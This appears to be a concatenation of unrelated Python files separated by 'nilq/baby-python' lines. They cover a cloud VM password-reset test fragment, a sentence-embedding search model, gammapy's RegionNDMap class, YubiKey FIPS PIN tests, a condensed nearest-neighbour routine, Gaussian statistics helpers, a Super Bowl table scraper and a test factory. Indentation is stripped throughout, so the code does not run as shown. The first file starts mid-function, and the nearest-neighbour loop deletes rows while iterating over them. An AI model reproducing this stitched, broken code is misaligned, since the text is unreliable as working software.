# check /etc/init.d/cloud-set-guest-password
ls_cmd = "ls /etc/init.d/cloud-set-guest-password"
ls_result = self.execute_cmd(ssh, ls_cmd)
ls_result = ls_result.lower()
self.debug("reponse from ls_cmd: " + ls_result)
if "no such file" in ls_result:
self.debug("NO CLOUD-SET_GUEST_PASSWORD FILE. NEED TO GET ONE")
self.install_cloud_set_guest_password_script(ssh)
self.stop_vm(self.vm_1)
self.create_template(self.vm_1)
self.debug("DEPLOY VM 2 IN TEST NETWORK WITH NEW TEMPLATE")
self.vm_2 = self.create_VM(self.network_1, vm_key="virtual_machine_userdata")
self.remove_vm2 = True
self.debug("STARTING VM_2 ")
vm_2a = self.vm_2.start(self.apiclient)
self.vm_2.password = vm_2a.password.strip()
self.vm_2.nic = vm_2a.nic
self.debug("VM - %s password - %s !" % (self.vm_2.name, self.vm_2.password))
self.assertNotEqual(self.vm_2.password,
self.test_data["virtual_machine_userdata"]["password"],
"Password enabled not working. Password same as virtual_machine password "
)
self.verify_vsp_vm(vm_2a)
self.debug("GET PUBLIC IP. CREATE AND VERIFIED FIREWALL RULES")
public_ip_2 = self.acquire_PublicIPAddress(self.network_1)
self.create_and_verify_fw(self.vm_2, public_ip_2, self.network_1)
self.ssh_into_VM(self.vm_2, public_ip_2)
vm_test = self.vm_2
vm_test_public_ip = public_ip_2
else:
self.debug("UPDATE TEMPLATE TO PASSWORD ENABLED")
self.updateTemplate(True)
self.assertEqual(self.template.passwordenabled, True, "Template is not password enabled")
vm_test = self.vm_1
vm_test_public_ip = public_ip_1
self.debug("RESETTING VM PASSWORD for VM - %s" % vm_test.name)
vm_test.password = vm_test.resetPassword(self.apiclient)
self.debug("Password reset to - %s" % vm_test.password)
self.debug("STARTING VM AND SSH TO VM TO VERIFY NEW PASSWORD")
vm_test.start(self.apiclient)
self.debug("VM - %s started!" % vm_test.name)
self.ssh_into_VM(vm_test, vm_test_public_ip)
|
nilq/baby-python
|
python
|
from typing import Union, List, Tuple, Callable, Dict, Optional
import numpy as np
from medsearch.models.base import TorchModelBase
from medsearch.models.utils import cosine_similarity
from medsearch.datasets.dataset import SemanticCorpusDataset
from sentence_transformers import SentenceTransformer
class SentenceTransformerModel(TorchModelBase):
def __init__(self,
dataset_cls:type=SemanticCorpusDataset,
network_fn:Callable=SentenceTransformer,
dataset_args:Dict=None,
network_args:Dict=None):
super().__init__(dataset_cls,None, network_fn, dataset_args, network_args)
def word_embeddings(self, corpus:List[str]):
self.embedder = lambda txt: np.array(self.network.encode(txt))
self.corpus_embed = self.embedder(corpus)
def get_similarity_vecs(self, query:Union[str,List[str]], topk:int=10):
self.query_embed = self.embedder(query)
scores = cosine_similarity(self.query_embed, self.corpus_embed)[0]
results = zip(range(len(scores)), scores)
results = sorted(results, key=lambda x: x[1], reverse=True)
return results[:topk]
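# Usage sketch (hypothetical corpus and query; assumes the model was constructed with a
# valid SentenceTransformer checkpoint):
#
#   model.word_embeddings(["a paper about transformers", "a study of optics"])
#   results = model.get_similarity_vecs("attention models", topk=2)  # list of (corpus_index, score)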
|
nilq/baby-python
|
python
|
from itertools import product
import numpy as np
from astropy import units as u
from astropy.io import fits
from astropy.table import Table
from astropy.visualization import quantity_support
from scipy.ndimage.measurements import label as ndi_label
from gammapy.extern.skimage import block_reduce
from gammapy.utils.interpolation import ScaledRegularGridInterpolator
from gammapy.utils.scripts import make_path
from .core import Map
from .geom import pix_tuple_to_idx
from .axes import MapAxes, MapAxis, TimeMapAxis
from .region import RegionGeom
from .utils import INVALID_INDEX
__all__ = ["RegionNDMap"]
class RegionNDMap(Map):
"""N-dimensional region map.
A `~RegionNDMap` owns a `~RegionGeom` instance as well as a data array
containing the values associated to that region in the sky along the non-spatial
axis, usually an energy axis. The spatial dimensions of a `~RegionNDMap`
are reduced to a single spatial bin with an arbitrary shape,
and any extra dimensions are described by an arbitrary number of non-spatial axes.
Parameters
----------
geom : `~gammapy.maps.RegionGeom`
Region geometry object.
data : `~numpy.ndarray`
Data array. If none then an empty array will be allocated.
dtype : str, optional
Data type, default is float32
meta : `dict`
Dictionary to store meta data.
unit : str or `~astropy.units.Unit`
The map unit
"""
def __init__(self, geom, data=None, dtype="float32", meta=None, unit=""):
if data is None:
data = np.zeros(geom.data_shape, dtype=dtype)
if meta is None:
meta = {}
self._geom = geom
self.data = data
self.meta = meta
self.unit = u.Unit(unit)
def plot(self, ax=None, axis_name=None, **kwargs):
"""Plot the data contained in region map along the non-spatial axis.
Parameters
----------
ax : `~matplotlib.pyplot.Axis`
Axis used for plotting
axis_name : str
Which axis to plot on the x axis. Extra axes will be plotted as
additional lines.
**kwargs : dict
Keyword arguments passed to `~matplotlib.pyplot.errorbar`
Returns
-------
ax : `~matplotlib.pyplot.Axis`
Axis used for plotting
"""
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
ax = ax or plt.gca()
if axis_name is None:
axis_name = 0
axis = self.geom.axes[axis_name]
kwargs.setdefault("marker", "+")
kwargs.setdefault("ls", "None")
kwargs.setdefault("xerr", axis.as_xerr)
if isinstance(axis, TimeMapAxis):
if axis.time_format == "iso":
center = axis.time_mid.datetime
else:
center = axis.time_mid.mjd * u.day
else:
center = axis.center
yerr_nd, yerr = kwargs.pop("yerr", None), None
uplims_nd, uplims = kwargs.pop("uplims", None), None
label_default = kwargs.pop("label", None)
labels = product(*[ax.as_labels for ax in self.geom.axes if ax.name != axis_name])
for label_axis, (idx, quantity) in zip(labels, self.iter_by_axis(axis_name=axis.name)):
if isinstance(yerr_nd, tuple):
yerr = yerr_nd[0][idx], yerr_nd[1][idx]
elif isinstance(yerr_nd, np.ndarray):
yerr = yerr_nd[idx]
if uplims_nd is not None:
uplims = uplims_nd[idx]
label = " ".join(label_axis) if label_default is None else label_default
with quantity_support():
ax.errorbar(
x=center,
y=quantity,
yerr=yerr,
uplims=uplims,
label=label,
**kwargs
)
if axis.interp == "log":
ax.set_xscale("log")
xlabel = axis.name.capitalize() + f" [{ax.xaxis.units}]"
if isinstance(axis, TimeMapAxis):
xlabel = axis.name.capitalize() + f" [{axis.time_format}]"
ax.set_xlabel(xlabel)
if not self.unit.is_unity():
ax.set_ylabel(f"Data [{self.unit}]")
if axis.interp == "log":
ax.set_yscale("log")
if isinstance(axis, TimeMapAxis) and axis.time_format == "iso":
ax.xaxis.set_major_formatter(DateFormatter("%Y-%m-%d %H:%M:%S"))
plt.setp(
ax.xaxis.get_majorticklabels(),
rotation=30,
ha="right",
rotation_mode="anchor",
)
if len(self.geom.axes) > 1:
plt.legend()
return ax
def plot_hist(self, ax=None, **kwargs):
"""Plot as histogram.
kwargs are forwarded to `~matplotlib.pyplot.hist`
Parameters
----------
ax : `~matplotlib.axis` (optional)
Axis instance to be used for the plot
**kwargs : dict
Keyword arguments passed to `~matplotlib.pyplot.hist`
Returns
-------
ax : `~matplotlib.pyplot.Axis`
Axis used for plotting
"""
import matplotlib.pyplot as plt
ax = plt.gca() if ax is None else ax
kwargs.setdefault("histtype", "step")
kwargs.setdefault("lw", 1)
axis = self.geom.axes[0]
with quantity_support():
weights = self.data[:, 0, 0]
ax.hist(axis.center.value, bins=axis.edges.value, weights=weights, **kwargs)
ax.set_xlabel(axis.name.capitalize() + f" [{axis.unit}]")
if not self.unit.is_unity():
ax.set_ylabel(f"Data [{self.unit}]")
ax.set_xscale("log")
ax.set_yscale("log")
return ax
def plot_interactive(self):
raise NotImplementedError(
"Interactive plotting currently not support for RegionNDMap"
)
def plot_region(self, ax=None, **kwargs):
"""Plot region
Parameters
----------
ax : `~astropy.vizualisation.WCSAxes`
Axes to plot on. If no axes are given,
the region is shown using the minimal
equivalent WCS geometry.
**kwargs : dict
Keyword arguments forwarded to `~regions.PixelRegion.as_artist`
"""
ax = self.geom.plot_region(ax, **kwargs)
return ax
def plot_mask(self, ax=None, **kwargs):
"""Plot the mask as a shaded area in a xmin-xmax range
Parameters
----------
ax : `~matplotlib.axis`
Axis instance to be used for the plot.
**kwargs : dict
Keyword arguments passed to `~matplotlib.pyplot.axvspan`
Returns
-------
ax : `~matplotlib.pyplot.Axis`
Axis used for plotting
"""
import matplotlib.pyplot as plt
if not self.is_mask:
raise ValueError("This is not a mask and cannot be plotted")
kwargs.setdefault("color", "k")
kwargs.setdefault("alpha", 0.05)
kwargs.setdefault("label", "mask")
ax = plt.gca() if ax is None else ax
edges = self.geom.axes["energy"].edges.reshape((-1, 1, 1))
labels, nlabels = ndi_label(self.data)
for idx in range(1, nlabels + 1):
mask = (labels == idx)
xmin = edges[:-1][mask].min().value
xmax = edges[1:][mask].max().value
ax.axvspan(xmin, xmax, **kwargs)
return ax
@classmethod
def create(cls, region, axes=None, dtype="float32", meta=None, unit="", wcs=None, binsz_wcs="0.1deg", data=None):
"""Create an empty region map object.
Parameters
----------
region : str or `~regions.SkyRegion`
Region specification
axes : list of `MapAxis`
Non spatial axes.
dtype : str
Data type, default is 'float32'
unit : str or `~astropy.units.Unit`
Data unit.
meta : `dict`
Dictionary to store meta data.
wcs : `~astropy.wcs.WCS`
WCS projection to use for local projections of the region
data : `~numpy.ndarray`
Data array
Returns
-------
map : `RegionNDMap`
Region map
"""
geom = RegionGeom.create(region=region, axes=axes, wcs=wcs, binsz_wcs=binsz_wcs)
return cls(geom=geom, dtype=dtype, unit=unit, meta=meta, data=data)
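# Usage sketch (illustrative values; assumes a standard energy axis):
#
#   axis = MapAxis.from_energy_bounds("1 TeV", "10 TeV", nbin=3)
#   m = RegionNDMap.create("icrs;circle(83.63, 22.01, 0.5)", axes=[axis])
#   m.data += 1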
def downsample(
self, factor, preserve_counts=True, axis_name="energy", weights=None
):
"""Downsample the non-spatial dimension by a given factor.
Parameters
----------
factor : int
Downsampling factor.
preserve_counts : bool
Preserve the integral over each bin. This should be true
if the map is an integral quantity (e.g. counts) and false if
the map is a differential quantity (e.g. intensity).
axis_name : str
Which axis to downsample. Default is "energy".
weights : `RegionNDMap`
Contains the weights to apply to the axis to reduce. Default
is just weighs of one.
Returns
-------
map : `RegionNDMap`
Downsampled region map.
"""
if axis_name is None:
return self.copy()
geom = self.geom.downsample(factor=factor, axis_name=axis_name)
block_size = [1] * self.data.ndim
idx = self.geom.axes.index_data(axis_name)
block_size[idx] = factor
if weights is None:
weights = 1
else:
weights = weights.data
func = np.nansum if preserve_counts else np.nanmean
if self.is_mask:
func = np.all
data = block_reduce(self.data * weights, tuple(block_size), func=func)
return self._init_copy(geom=geom, data=data)
def upsample(self, factor, preserve_counts=True, axis_name="energy"):
"""Upsample the non-spatial dimension by a given factor.
Parameters
----------
factor : int
Upsampling factor.
preserve_counts : bool
Preserve the integral over each bin. This should be true
if the RegionNDMap is an integral quantity (e.g. counts) and false if
the RegionNDMap is a differential quantity (e.g. intensity).
axis_name : str
Which axis to upsample. Default is "energy".
Returns
-------
map : `RegionNDMap`
Upsampled region map.
"""
geom = self.geom.upsample(factor=factor, axis_name=axis_name)
data = self.interp_by_coord(geom.get_coord())
if preserve_counts:
data /= factor
return self._init_copy(geom=geom, data=data)
def iter_by_axis(self, axis_name):
"""Iterate data by axis
Parameters
----------
axis_name : str
Axis name
Returns
-------
idx, data : tuple, `~astropy.units.Quantity`
Data and index
"""
idx_axis = self.geom.axes.index_data(axis_name)
shape = list(self.data.shape)
shape[idx_axis] = 1
for idx in np.ndindex(*shape):
idx = list(idx)
idx[idx_axis] = slice(None)
yield tuple(idx), self.quantity[tuple(idx)]
def fill_by_idx(self, idx, weights=None):
idx = pix_tuple_to_idx(idx)
msk = np.all(np.stack([t != INVALID_INDEX.int for t in idx]), axis=0)
idx = [t[msk] for t in idx]
if weights is not None:
if isinstance(weights, u.Quantity):
weights = weights.to_value(self.unit)
weights = weights[msk]
idx = np.ravel_multi_index(idx, self.data.T.shape)
idx, idx_inv = np.unique(idx, return_inverse=True)
weights = np.bincount(idx_inv, weights=weights).astype(self.data.dtype)
self.data.T.flat[idx] += weights
def get_by_idx(self, idxs):
return self.data[idxs[::-1]]
def interp_by_coord(self, coords, method="linear", fill_value=None):
pix = self.geom.coord_to_pix(coords)
return self.interp_by_pix(pix, method=method, fill_value=fill_value)
def interp_by_pix(self, pix, method="linear", fill_value=None):
grid_pix = [np.arange(n, dtype=float) for n in self.data.shape[::-1]]
if np.any(np.isfinite(self.data)):
data = self.data.copy().T
data[~np.isfinite(data)] = 0.0
else:
data = self.data.T
fn = ScaledRegularGridInterpolator(
grid_pix, data, fill_value=fill_value, method=method
)
return fn(tuple(pix), clip=False)
def set_by_idx(self, idx, value):
self.data[idx[::-1]] = value
@classmethod
def read(cls, filename, format="gadf", ogip_column=None, hdu=None):
"""Read from file.
Parameters
----------
filename : `pathlib.Path` or str
Filename.
format : {"gadf", "ogip", "ogip-arf"}
Which format to use.
ogip_column : {None, "COUNTS", "QUALITY", "BACKSCAL"}
If format 'ogip' is chosen which table hdu column to read.
hdu : str
Name or index of the HDU with the map data.
Returns
-------
region_map : `RegionNDMap`
Region nd map
"""
filename = make_path(filename)
with fits.open(filename, memmap=False) as hdulist:
return cls.from_hdulist(hdulist, format=format, ogip_column=ogip_column, hdu=hdu)
def write(self, filename, overwrite=False, format="gadf", hdu="SKYMAP"):
"""Write map to file
Parameters
----------
filename : `pathlib.Path` or str
Filename.
format : {"gadf", "ogip", "ogip-sherpa", "ogip-arf", "ogip-arf-sherpa"}
Which format to use.
overwrite : bool
Overwrite existing files?
"""
filename = make_path(filename)
self.to_hdulist(format=format, hdu=hdu).writeto(
filename, overwrite=overwrite
)
def to_hdulist(self, format="gadf", hdu="SKYMAP", hdu_bands=None, hdu_region=None):
"""Convert to `~astropy.io.fits.HDUList`.
Parameters
----------
format : {"gadf", "ogip", "ogip-sherpa", "ogip-arf", "ogip-arf-sherpa"}
Format specification
hdu : str
Name of the HDU with the map data, used for "gadf" format.
hdu_bands : str
Name or index of the HDU with the BANDS table, used for "gadf" format.
hdu_region : str
Name or index of the HDU with the region table.
Returns
-------
hdulist : `~astropy.fits.HDUList`
HDU list
"""
hdulist = fits.HDUList()
table = self.to_table(format=format)
if hdu_bands is None:
hdu_bands = f"{hdu.upper()}_BANDS"
if hdu_region is None:
hdu_region = f"{hdu.upper()}_REGION"
if format in ["ogip", "ogip-sherpa", "ogip-arf", "ogip-arf-sherpa"]:
hdulist.append(fits.BinTableHDU(table))
elif format == "gadf":
table.meta.update(self.geom.axes.to_header())
hdulist.append(fits.BinTableHDU(table, name=hdu))
else:
raise ValueError(f"Unsupported format '{format}'")
if format in ["ogip", "ogip-sherpa", "gadf"]:
hdulist_geom = self.geom.to_hdulist(format=format, hdu_bands=hdu_bands, hdu_region=hdu_region)
hdulist.extend(hdulist_geom[1:])
return hdulist
@classmethod
def from_table(cls, table, format="", colname=None):
"""Create region map from table
Parameters
----------
table : `~astropy.table.Table`
Table with input data
format : {"gadf-sed}
Format to use
colname : str
Column name to take the data from.
Returns
-------
region_map : `RegionNDMap`
Region map
"""
if format == "gadf-sed":
if colname is None:
raise ValueError(f"Column name required")
axes = MapAxes.from_table(table=table, format=format)
if colname == "stat_scan":
axes = axes
# TODO: this is not officially supported by GADF...
# replace by LabelledMapAxis
elif colname == "counts":
edges = np.arange(table[colname].shape[1] + 1) - 0.5
axis = MapAxis.from_edges(edges, name="dataset-idx")
axes = [axis, axes["energy"]]
else:
axes = [axes["energy"]]
data = table[colname].data
unit = table[colname].unit or ""
else:
raise ValueError(f"Format not supported {format}")
geom = RegionGeom.create(region=None, axes=axes)
return cls(geom=geom, data=data, unit=unit, meta=table.meta)
@classmethod
def from_hdulist(cls, hdulist, format="gadf", ogip_column=None, hdu=None, **kwargs):
"""Create from `~astropy.io.fits.HDUList`.
Parameters
----------
hdulist : `~astropy.io.fits.HDUList`
HDU list.
format : {"gadf", "ogip", "ogip-arf"}
Format specification
ogip_column : {"COUNTS", "QUALITY", "BACKSCAL"}
If format 'ogip' is chosen which table hdu column to read.
hdu : str
Name or index of the HDU with the map data.
Returns
-------
region_nd_map : `RegionNDMap`
Region map.
"""
defaults = {
"ogip": {"hdu": "SPECTRUM", "column": "COUNTS"},
"ogip-arf": {"hdu": "SPECRESP", "column": "SPECRESP"},
"gadf": {"hdu": "SKYMAP", "column": "DATA"},
}
if hdu is None:
hdu = defaults[format]["hdu"]
if ogip_column is None:
ogip_column = defaults[format]["column"]
geom = RegionGeom.from_hdulist(hdulist, format=format, hdu=hdu)
table = Table.read(hdulist[hdu])
quantity = table[ogip_column].quantity
if ogip_column == "QUALITY":
data, unit = np.logical_not(quantity.value.astype(bool)), ""
else:
data, unit = quantity.value, quantity.unit
return cls(geom=geom, data=data, meta=table.meta, unit=unit)
def _pad_spatial(self, *args, **kwargs):
raise NotImplementedError("Spatial padding is not supported by RegionNDMap")
def crop(self):
raise NotImplementedError("Crop is not supported by RegionNDMap")
def stack(self, other, weights=None, nan_to_num=True):
"""Stack other region map into map.
Parameters
----------
other : `RegionNDMap`
Other map to stack
weights : `RegionNDMap`
Array to be used as weights. The spatial geometry must be equivalent
to `other` and additional axes must be broadcastable.
nan_to_num: bool
Non-finite values are replaced by zero if True (default).
"""
data = other.quantity.to_value(self.unit).astype(self.data.dtype)
# TODO: re-think stacking of regions. Is making the union reasonable?
# self.geom.union(other.geom)
if nan_to_num:
data = data.copy()
data[~np.isfinite(data)] = 0
if weights is not None:
if not other.geom.to_image() == weights.geom.to_image():
raise ValueError("Incompatible geoms between map and weights")
data = data * weights.data
self.data += data
def to_table(self, format="gadf"):
"""Convert to `~astropy.table.Table`.
Data format specification: :ref:`gadf:ogip-pha`
Parameters
----------
format : {"gadf", "ogip", "ogip-arf", "ogip-arf-sherpa"}
Format specification
Returns
-------
table : `~astropy.table.Table`
Table
"""
data = np.nan_to_num(self.quantity[:, 0, 0])
if format == "ogip":
if len(self.geom.axes) > 1:
raise ValueError(f"Writing to format '{format}' only supports a "
f"single energy axis. Got {self.geom.axes.names}")
energy_axis = self.geom.axes[0]
energy_axis.assert_name("energy")
table = Table()
table["CHANNEL"] = np.arange(energy_axis.nbin, dtype=np.int16)
table["COUNTS"] = np.array(data, dtype=np.int32)
# see https://heasarc.gsfc.nasa.gov/docs/heasarc/ofwg/docs/spectra/ogip_92_007/node6.html
table.meta = {
"EXTNAME": "SPECTRUM",
"telescop": "unknown",
"instrume": "unknown",
"filter": "None",
"exposure": 0,
"corrfile": "",
"corrscal": "",
"ancrfile": "",
"hduclass": "OGIP",
"hduclas1": "SPECTRUM",
"hduvers": "1.2.1",
"poisserr": True,
"chantype": "PHA",
"detchans": energy_axis.nbin,
"quality": 0,
"backscal": 0,
"grouping": 0,
"areascal": 1,
}
elif format in ["ogip-arf", "ogip-arf-sherpa"]:
if len(self.geom.axes) > 1:
raise ValueError(f"Writing to format '{format}' only supports a "
f"single energy axis. Got {self.geom.axes.names}")
energy_axis = self.geom.axes[0]
table = energy_axis.to_table(format=format)
table.meta = {
"EXTNAME": "SPECRESP",
"telescop": "unknown",
"instrume": "unknown",
"filter": "None",
"hduclass": "OGIP",
"hduclas1": "RESPONSE",
"hduclas2": "SPECRESP",
"hduvers": "1.1.0"
}
if format == "ogip-arf-sherpa":
data = data.to("cm2")
table["SPECRESP"] = data
elif format == "gadf":
table = Table()
data = self.quantity.flatten()
table["CHANNEL"] = np.arange(len(data), dtype=np.int16)
table["DATA"] = data
else:
raise ValueError(f"Unsupported format: '{format}'")
meta = {k: self.meta.get(k, v) for k, v in table.meta.items()}
table.meta.update(meta)
return table
def get_spectrum(self, *args, **kwargs):
"""Return self"""
return self
def to_region_nd_map(self, *args, **kwargs):
return self
def cutout(self, *args, **kwargs):
"""Return self"""
return self
|
nilq/baby-python
|
python
|
from .shi import Shi
from .ni import Ni
from .mi import Mi
from .i import I
from ._diacritic import Ji
__all__ = [
"Shi",
"Ni",
"Mi",
"I",
"Ji",
]
|
nilq/baby-python
|
python
|
from fido2.ctap1 import ApduError
from yubikit.core import TRANSPORT
from yubikit.management import CAPABILITY
from yubikit.core.smartcard import SW
from ykman.fido import fips_change_pin, fips_verify_pin, fips_reset, is_in_fips_mode
from . import condition
import pytest
@pytest.fixture(autouse=True)
@condition.fips(True)
@condition.capability(CAPABILITY.U2F)
@condition.transport(TRANSPORT.USB)
def preconditions():
pass
class TestFipsU2fCommands:
def test_pin_commands(self, fido_connection):
# Assumes PIN is 012345 or not set at beginning of test
# Make sure PIN is 012345
try:
fips_verify_pin(fido_connection, "012345")
fips_change_pin(fido_connection, "012345", "012345")
except ApduError as e:
if e.code == SW.VERIFY_FAIL_NO_RETRY:
pytest.skip("PIN set to something other than 012345")
elif e.code == SW.AUTH_METHOD_BLOCKED:
pytest.skip("PIN blocked")
elif e.code == SW.COMMAND_NOT_ALLOWED:
fips_change_pin(fido_connection, None, "012345")
# Verify with correct PIN
fips_verify_pin(fido_connection, "012345")
# Change the PIN, verify, then change back
fips_change_pin(fido_connection, "012345", "012012")
fips_verify_pin(fido_connection, "012012")
fips_change_pin(fido_connection, "012012", "012345")
# Verify with incorrect PIN
with pytest.raises(ApduError) as ctx:
fips_verify_pin(fido_connection, "543210")
assert SW.VERIFY_FAIL_NO_RETRY == ctx.value.code
# Verify with correct PIN
fips_verify_pin(fido_connection, "012345")
def test_reset_command(self, fido_connection):
try:
fips_reset(fido_connection)
except ApduError as e:
assert e.code in [SW.COMMAND_NOT_ALLOWED, SW.CONDITIONS_NOT_SATISFIED]
def test_verify_fips_mode_command(self, fido_connection):
is_in_fips_mode(fido_connection)
|
nilq/baby-python
|
python
|
import random
from utils import cosine_distance
import numpy as np
class IterativeCondensedNN:
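# Appears to implement a variant of Hart's Condensed Nearest Neighbour rule: starting
# from one random prototype, points whose nearest stored prototype has a different class
# label are added to the prototype set, and the sweep repeats until no new prototypes
# are added.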
def __init__(self):
self.y_index = {}
def fit(self, X_train,y):
for idx, observation in enumerate(X_train):
self.y_index[observation.tostring()] = idx
samples = []
_random = random.randint(0, len(X_train) - 1)
samples.append(X_train[_random])
X_train = np.delete(X_train, _random, axis=0)
n_samples = len(samples)
while True:
# set initial distance high to always improve at the beginning
minSampleDistance = 99999
closestSample = None
closestClass = None
for idx, observation in enumerate(X_train):
# self.y_index[observation.tostring()] = idx
for sample in samples:
print(observation.shape, sample.shape)
sampleDistance = cosine_distance(observation, sample)
if sampleDistance < minSampleDistance:
minSampleDistance = sampleDistance
closestClass = y[self.y_index[sample.tostring()]]
if closestClass == y[self.y_index[observation.tostring()]]:
# both are the same class and keep the closest sample
continue
else: # different add to cleansed dataset
samples.append(X_train[idx])
X_train = np.delete(X_train, idx, axis=0)
if len(samples) == n_samples:
# no new samples on this pass, exit the while loop
break
# update the number of samples to check against the next run
n_samples = len(samples)
print("Number of samples selected: " + str(len(samples)))
return samples
|
nilq/baby-python
|
python
|
import autograd.numpy as np
import autograd.numpy.linalg as npla
from autograd.scipy.special import gammaln
def sigmoid(a):
return 1. / (1. + np.exp(-a))
def logit(a):
return np.log(a) - np.log(1-a)
def mvn_diag_logpdf(x, mean, log_std):
D = len(mean)
qterm = -.5 * np.sum((x - mean)**2 / np.exp(2.*log_std), axis=1)
coef = -.5*D * np.log(2.*np.pi) - np.sum(log_std)
return qterm + coef
def mvn_diag_logpdf_grad(x, mean, log_std):
# left unimplemented upstream; a natural completion (an assumption, not the original
# author's code) is the gradient of mvn_diag_logpdf with respect to x:
return -(x - mean) / np.exp(2. * log_std)
def mvn_diag_entropy(log_std):
D = len(log_std)
return .5 * (D*np.log(2*np.pi*np.e) + np.sum(2*log_std))
def mvn_logpdf(x, mean, icholSigma):
D = len(mean)
coef = -.5*D*np.log(2.*np.pi)
dterm = np.sum(np.log(np.diag(icholSigma)))
white = np.dot(np.atleast_2d(x) - mean, icholSigma.T)
qterm = -.5*np.sum(white**2, axis=1)
ll = coef + dterm + qterm
if len(ll) == 1:
return ll[0]
return ll
def mvn_fisher_info(params):
""" returns the fisher information matrix (diagonal) for a multivariate
normal distribution with params = [mu, ln sigma] """
D = len(params) // 2  # integer division so D can be used as a slice index
mean, log_std = params[:D], params[D:]
return np.concatenate([np.exp(-2.*log_std),
2*np.ones(D)])
def kl_mvn(m0, S0, m1, S1):
"""KL divergence between two normal distributions - can
m0: N x
"""
# .5 log det (Sig1 Sig0^-1)
# + .5 tr( Sig1^-1 * ((mu_0 - mu_1)(mu_0 - mu_1)^T + Sig0 - Sig1) )
det_term = .5 * np.log(npla.det(npla.solve(S0, S1).T))
S1inv = npla.inv(S1)
diff = m0 - m1
outers = np.einsum("id,ie->ide", diff, diff) + S0 - S1
tr_term = .5 * np.einsum("de,ide->i", S1inv, outers)
return det_term + tr_term
def kl_mvn_diag(m0, S0, m1, S1):
"""
Kullback-Leibler divergence from Gaussian pm,pv to Gaussian qm,qv.
Also computes KL divergence from a single Gaussian pm,pv to a set
of Gaussians qm,qv.
Diagonal covariances are assumed. Divergence is expressed in nats.
- accepts stacks of means, but only one S0 and S1
From wikipedia
KL( (m0, S0) || (m1, S1))
= .5 * ( tr(S1^{-1} S0) + log |S1|/|S0| +
(m1 - m0)^T S1^{-1} (m1 - m0) - N )
"""
# store inv diag covariance of S1 and diff between means
N = m0.shape[1]
iS1 = 1./S1
diff = m1 - m0
# kl is made of three terms
tr_term = np.sum(iS1 * S0)
det_term = np.sum(np.log(S1)) - np.sum(np.log(S0))
quad_term = np.sum( (diff*diff) * iS1, axis=1)
return .5 * (tr_term + det_term + quad_term - N)
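# Quick sanity check (sketch): identical diagonal Gaussians give zero divergence, e.g.
#   kl_mvn_diag(np.zeros((1, 2)), np.ones(2), np.zeros((1, 2)), np.ones(2))  # -> array([0.])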
def gamma_lnpdf(x, shape, rate):
""" shape/rate formulation on wikipedia """
coef = shape * np.log(rate) - gammaln(shape)
dterm = (shape-1.) * np.log(x) - rate*x
return coef + dterm
def make_fixed_cov_mvn_logpdf(Sigma):
icholSigma = np.linalg.inv(np.linalg.cholesky(Sigma))
return lambda x, mean: mvn_logpdf(x, mean, icholSigma)
def unpack_params(params):
mean, log_std = np.split(params, 2)
return mean, log_std
def unconstrained_to_simplex(rhos):
rhosf = np.concatenate([rhos, [0.]])
pis = np.exp(rhosf) / np.sum(np.exp(rhosf))
return pis
def simplex_to_unconstrained(pis):
lnpis = np.log(pis)
return (lnpis - lnpis[-1])[:-1]
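# unconstrained_to_simplex and simplex_to_unconstrained are inverse maps: the simplex point
# is a softmax over the logits with the last logit pinned to zero, e.g.
#   unconstrained_to_simplex(np.zeros(2))      # -> approx. array([0.333, 0.333, 0.333])
#   simplex_to_unconstrained(np.ones(3) / 3.)  # -> array([0., 0.])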
|
nilq/baby-python
|
python
|
from bs4 import BeautifulSoup
import urllib.request
import csv
web_page = urllib.request.urlopen('https://en.wikipedia.org/wiki/List_of_Super_Bowl_champions')
soup = BeautifulSoup(web_page, "html.parser")
super_bowl_table = soup.find_all('table', {'class': 'wikitable'})[1]
in_file = open("result.csv", 'w')
csv_writer = csv.writer(in_file, delimiter=',')
csv_writer.writerows([["Game number", "year", "winning team", "score", "losing team", "venue"]])
super_bowl_list = []
for row in super_bowl_table.find_all('tr')[1:51]:
cells = row.find_all('td')
super_bowl_list = [[
cells[0].find('span', {'class': 'sorttext'}).get_text(),
cells[1].find_all('span')[1].get_text().split()[2],
cells[2].find('span', {'class': 'sortkey'}).get_text().replace(" !", ""),
cells[3].find('span', {'class': 'sorttext'}).get_text(),
cells[4].find('span', {'class': 'sortkey'}).get_text().replace(" !", ""),
cells[5].find('span', {'class': 'sortkey'}).get_text().replace(" !", "")
]]
csv_writer.writerows(super_bowl_list)
|
nilq/baby-python
|
python
|
import factory
from app.utils import db
from app.models.category import Category
from factories.department_factory import DepartmentFactory
class CategoryFactory(factory.alchemy.SQLAlchemyModelFactory):
class Meta:
model = Category
sqlalchemy_session = db.session
category_id = factory.Sequence(lambda n: n)
name = factory.Faker('name')
description = factory.Faker('sentence')
department_id = factory.Sequence(lambda n: n)
|
nilq/baby-python
|
python
|